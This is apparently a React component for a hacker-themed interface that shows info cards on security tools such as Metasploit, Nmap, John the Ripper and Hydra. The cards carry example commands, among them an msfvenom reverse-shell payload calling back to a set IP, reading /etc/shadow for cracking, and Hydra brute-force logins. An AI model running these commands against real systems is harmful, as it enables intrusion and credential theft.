import React from 'react';
import styled from 'styled-components';

const InfoModal = styled.div<{ visible: boolean }>`
  position: fixed;
  top: 0;
  left: 0;
  width: 100vw;
  height: 100vh;
  background: rgba(0, 0, 0, 0.8);
  display: ${props => props.visible ? 'flex' : 'none'};
  align-items: center;
  justify-content: center;
  z-index: 3000;
  backdrop-filter: blur(10px);
`;

const InfoCard = styled.div`
  background: rgba(0, 0, 0, 0.95);
  border: 2px solid #00ff00;
  border-radius: 12px;
  padding: 30px;
  max-width: 500px;
  width: 90%;
  color: #00ff00;
  font-family: 'Ubuntu', sans-serif;
  box-shadow: 0 0 30px rgba(0, 255, 0, 0.3);
`;

const AppIcon = styled.div`
  font-size: 48px;
  text-align: center;
  margin-bottom: 20px;
`;

const AppTitle = styled.h2`
  color: #00ffff;
  text-align: center;
  margin-bottom: 15px;
`;

const AppDescription = styled.p`
  color: #cccccc;
  line-height: 1.6;
  margin-bottom: 20px;
`;

const UseCases = styled.div`
  margin-bottom: 20px;
`;

const SectionTitle = styled.h4`
  color: #00ffff;
  margin-bottom: 10px;
`;

const UseCase = styled.div`
  color: #cccccc;
  margin-bottom: 8px;
  padding-left: 15px;
  position: relative;

  &::before {
    content: '▶';
    position: absolute;
    left: 0;
    color: #00ff00;
  }
`;

const CommandsSection = styled.div`
  background: rgba(0, 0, 0, 0.7);
  border: 1px solid rgba(0, 255, 0, 0.3);
  border-radius: 8px;
  padding: 15px;
  margin-bottom: 20px;
`;

const Command = styled.div`
  font-family: 'Courier New', monospace;
  color: #00ff00;
  margin-bottom: 5px;
  font-size: 12px;
`;

const CloseButton = styled.button`
  background: rgba(255, 0, 0, 0.2);
  border: 1px solid #ff0000;
  color: #ff0000;
  padding: 10px 20px;
  border-radius: 6px;
  cursor: pointer;
  font-family: inherit;
  width: 100%;
  transition: background 0.3s ease;

  &:hover {
    background: rgba(255, 0, 0, 0.3);
  }
`;

interface AppInfo {
  name: string;
  icon: string;
  description: string;
  useCases: string[];
  commands: string[];
}

const appDatabase: Record<string, AppInfo> = {
  'Burp Suite': {
    name: 'Burp Suite',
    icon: '🔍',
    description: 'Burp Suite is a leading toolkit for web application security testing. It combines an intercepting proxy, application-aware spider, advanced web application scanner, and various tools for manual testing.',
    useCases: [
      'Web application penetration testing',
      'API security testing',
      'Manual security testing',
      'Automated vulnerability scanning',
      'Session management testing'
    ],
    commands: [
      'burpsuite --config-file=project.json',
      'java -jar burpsuite_pro.jar',
      'burpsuite --project-file=test.burp'
    ]
  },
  'Metasploit': {
    name: 'Metasploit Framework',
    icon: '🎯',
    description: 'Metasploit is a penetration testing framework that makes hacking simple. It provides information about security vulnerabilities and aids in penetration testing and IDS signature development.',
    useCases: [
      'Exploit development and testing',
      'Payload generation',
      'Post-exploitation activities',
      'Vulnerability validation',
      'Security awareness training'
    ],
    commands: [
      'msfconsole',
      'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe',
      'use exploit/multi/handler',
      'search type:exploit platform:windows'
    ]
  },
  'Wireshark': {
    name: 'Wireshark',
    icon: '📊',
    description: 'Wireshark is a network protocol analyzer that lets you capture and interactively browse the traffic running on a computer network. It is the de facto standard across many industries.',
    useCases: [
      'Network troubleshooting',
      'Analysis of network protocols',
      'Network security monitoring',
      'Reverse engineering protocols',
      'Educational purposes'
    ],
    commands: [
      'wireshark',
      'tshark -i eth0 -w capture.pcap',
      'tshark -r capture.pcap -Y "http.request.method == GET"',
      'dumpcap -i any -w traffic.pcap'
    ]
  },
  'Nmap': {
    name: 'Network Mapper (Nmap)',
    icon: '🗺️',
    description: 'Nmap is a network discovery and security auditing tool. It uses raw IP packets to determine what hosts are available on the network, what services they are offering, and what operating systems they are running.',
    useCases: [
      'Network discovery and mapping',
      'Port scanning and service detection',
      'Operating system detection',
      'Vulnerability scanning',
      'Network inventory and monitoring'
    ],
    commands: [
      'nmap -sS 192.168.1.0/24',
      'nmap -sV -sC target.com',
      'nmap --script vuln target.com',
      'nmap -O 192.168.1.1'
    ]
  },
  'John': {
    name: 'John the Ripper',
    icon: '🔐',
    description: 'John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords.',
    useCases: [
      'Password strength testing',
      'Hash cracking',
      'Security auditing',
      'Forensic analysis',
      'Compliance testing'
    ],
    commands: [
      'john --wordlist=rockyou.txt hashes.txt',
      'john --show hashes.txt',
      'john --format=NT hashes.txt',
      'unshadow /etc/passwd /etc/shadow > mypasswd.txt'
    ]
  },
  'Hydra': {
    name: 'THC Hydra',
    icon: '💧',
    description: 'Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.',
    useCases: [
      'Brute force attacks on login services',
      'Password auditing',
      'Network service testing',
      'Security assessments',
      'Penetration testing'
    ],
    commands: [
      'hydra -l admin -P passwords.txt ssh://192.168.1.100',
      'hydra -L users.txt -P passwords.txt ftp://target.com',
      'hydra -l admin -x 4:6:a target.com http-post-form',
      'hydra -C credentials.txt ssh://192.168.1.100'
    ]
  }
};

interface SystemAppInfoProps {
  appName: string | null;
  onClose: () => void;
}

const SystemAppInfo: React.FC<SystemAppInfoProps> = ({ appName, onClose }) => {
  if (!appName || !appDatabase[appName]) return null;

  const app = appDatabase[appName];

  return (
    <InfoModal visible={!!appName} onClick={onClose}>
      <InfoCard onClick={(e) => e.stopPropagation()}>
        <AppIcon>{app.icon}</AppIcon>
        <AppTitle>{app.name}</AppTitle>
        <AppDescription>{app.description}</AppDescription>
        
        <UseCases>
          <SectionTitle>Common Use Cases:</SectionTitle>
          {app.useCases.map((useCase, index) => (
            <UseCase key={index}>{useCase}</UseCase>
          ))}
        </UseCases>

        <CommandsSection>
          <SectionTitle>Basic Commands:</SectionTitle>
          {app.commands.map((command, index) => (
            <Command key={index}>$ {command}</Command>
          ))}
        </CommandsSection>

        <CloseButton onClick={onClose}>
          Close
        </CloseButton>
      </InfoCard>
    </InfoModal>
  );
};

export default SystemAppInfo;
